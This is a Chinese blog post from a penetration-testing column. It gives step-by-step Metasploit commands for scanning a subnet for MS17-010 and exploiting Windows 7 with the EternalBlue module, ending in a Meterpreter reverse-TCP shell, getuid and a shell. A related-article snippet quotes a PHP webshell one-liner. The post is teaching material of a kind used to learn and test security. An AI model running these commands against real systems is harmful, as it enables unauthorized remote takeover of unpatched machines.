网络服务渗透攻击

最新推荐文章于 2024-04-22 14:27:46 发布
最新推荐文章于 2024-04-22 14:27:46 发布
阅读量982 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thj_1995/article/details/84901011
版权

通过   MS17-010  “永恒之蓝”  来给大家演示一下MSF使用

    @    启动MSF
    [msfconsole]
 

    @    搜索MS17-010 模块           win7
    [search ms17_010]
    
    
    
    @ 切换到 use scanner/smb/smb/ms17_010   
    
    set  RHOST 192.168.0.1/24
    
    set  THREADS  50
    
    进行扫描win7系统

    @    使用“永恒之蓝”模块
    [use exploit/windows/smb/ms17_010_eternalblue]。
 

    @    显示模块详细信息
    [info]
 

    @    显示受到该漏洞影响的操作系统
    [show targets]
 

    根据要渗透测试的目标操作系统类型,可以使用[set target id] 设置。

    @    显示模块参数
    [show options]
 

    @    设置渗透目标地址
    [set RHOST 192.168.0.106]        
 

    @    显示可用payload
    [show payloads]
 

    可用的payload 有很多,我们一般选用meterpreter 框架下的tcp 反弹连接的payload。

    @    使用payload
    [set payload windows/x64/meterpreter/reverse_tcp]
 

    @    设置payload 参数
    [set LHOST 192.168.0.105]  本地地址
 

    默认端口为4444。
    
    @    渗透攻击
    [exploit]
 

    @    查看权限
    [getuid]
 
        @显示meterpreter  
         
         shell

thj_blog
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络渗透技术
m0_62309510的博客
03-08 4553
一、收集域名信息 1、Whois查询 定义:标准的互联网协议,可用于搜集网络注册信息,注册的域名、IP地址等信息。(简单来说,Whois是一个用于查询域名是否已被注册以及注册域名的详细信息的数据库) 在线Whois查询的常用网站:爱站工具网(https://whois.aizhan.com) 站长之家(http://whois.chinaz.com) ...
《Metasploit渗透测试魔鬼训练营》笔记 网络服务渗透攻击
qq_31411551的博客
05-18 468
1
网络攻击(一)--安全渗透简介_
最新发布
ewii12567的博客
04-22 970
目标了解渗透测试的基本概念了解渗透测试从业人员的注意事项在了解渗透测试之前,我们先看看,信息安全相关的法律是怎么样的中华人民共和国网络安全法《中华人民共和国网络安全法》由全国人民代表大会常务委员会于2016年11月7日发布,自2017年6月1日起施行。中华人民共和国网络安全法– 中国人大网官方版本第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息,不得非法出售或者非法向他人提供个人信息。
网络安全】-- 网络渗透技术攻防(--更新中)
用余生去守护的博客
12-22 3057
我今日所做的事远比我往日的所作所为更好,更好;我今日将享受的安息远比我所知的一切更好,更好。
渗透测试网络攻防--OSINT和被动侦察
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
01-18 725
OSINT OSINT,是指可以从公告资源,特别是互联网中可以进行信息收集 分类 进攻性 收集目标测试过程中的相关信息 防御性 收集目标以前的违规信或与之相关的安全信息 收集信息范围 进攻 域名 谷歌缓冲 子域名 IP地址 电子邮件 共享主机列表 社交媒体 Google黑客 日志文件 敏感文件 数据库文件 防御 安全漏洞 威胁情报 被动侦察 定义 不与目标直接发生交互,利用OSINT途径进行信息收集或侦察 域名注册...
渗透技术——ARP攻击
weixin_43520214的博客
03-21 8689
这篇文章简单的介绍了ARP渗透攻击及其简单的实验过程。
网络渗透攻击与安防修炼完整版
03-27
网络渗透攻击与安防修炼完整版。电子版仅供预览及学习交流使用,下载后请24小时内删除,支持正版,喜欢的请购买正版书籍。
网络渗透攻击实训教程
11-15
网络渗透攻击实训教程,很好的教程,可以下来看看
渗透攻击分析.wps
03-23
渗透移动网络攻击主要是在泛指非法利用移动手机通信客户端本身依然存在的手机操作系统安全保护层和地下移动网络应用层上的网络数据安全漏洞,以非法间接窃取地下移动网络上的移动虚拟机和移动资产配置信息等作为主要...
渗透攻击个人分析.docx
03-23
渗透移动网络攻击主要是在泛指非法利用移动手机通信客户端本身依然存在的手机操作系统安全保护层和地下移动网络应用层上的网络数据安全漏洞,以非法间接窃取地下移动网络上的移动虚拟机和移动资产配置信息等作为主要...
网络渗透--《C++中溢出覆盖虚函数指针技术》
06-10
网络渗透--《C++中溢出覆盖虚函数指针技术》,内部安全资料,在此与大家分享,欢迎下载...........
网络渗透技术(深入分析)
10-22
纤细的阐述了网络渗透等相关的技术,希望大家关注。PDG文档!!~~
【网安扫盲】网络渗透测试的相关技术有什么?
Y525698136的博客
07-05 440
对于从来没有接触过网络安全的同学,我帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
网络渗透技术》 强烈推荐
爱.NET
09-18 345
网络渗透技术》 强烈推荐 信息来源:http://www.xfocus.net/projects/book/9.html 《网络渗透技术》配套资料http://www.xfocus.net/projects/book/npt/ 《网络渗透技术》配套资料打包http://www.xfocus.net/projects/book/npt/npt.rar 目前本书可以在如下几个网络书店买到: htt...
c++使用netsh命令_渗透常用命令IPC$内网(一)
weixin_34670892的博客
12-23 539
一、IPC$命令IPC$命令在内网渗透测试中还是经常使用的,也是一款不错的命令。说白了就是一个共享命名管道的资源,它是为了让进城间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,从而在本机进行远程管理目标主机和查看目标主机的共享资源。 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445...
网络渗透测试的概念以及作用
qq_33769308的博客
01-28 2697
1、什么是网络渗透测试 2、测试的内容涵盖 3、所使用的工具 4、渗透测试的作用
好文转载 ONE DAY |网络安全渗透测试之跨网段攻击
AI_data_cloud的博客
05-05 569
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
网络安全2:各种经典渗透方式合集
热门推荐
ac121388的博客
03-30 1万+
文件上传漏洞 文件包含 有一些主页的php代买中包含了 include *,当上传了一些包含能够生成webshell(一句话木马)的文件后,由index.php自动执行,生成木马。 本地文件包含漏洞 1 向图片中添加一句话病毒 <?fputs(fopen("shell20.php","w"),'<?php eval($_POST[qt]);?>')?> 2. 使用owasp靶机上的dvwa页面上传带有病毒代码的图片 3. 使用中国菜刀控制服务
针对web服务器的渗透攻击
06-08
针对Web服务器的渗透攻击通常包括以下步骤: 1. 信息收集:攻击者通过各种方法,例如网络扫描、端口扫描和漏洞扫描等,收集目标Web服务器的信息,包括操作系统、Web服务器软件等。 2. 漏洞扫描:攻击者通过漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值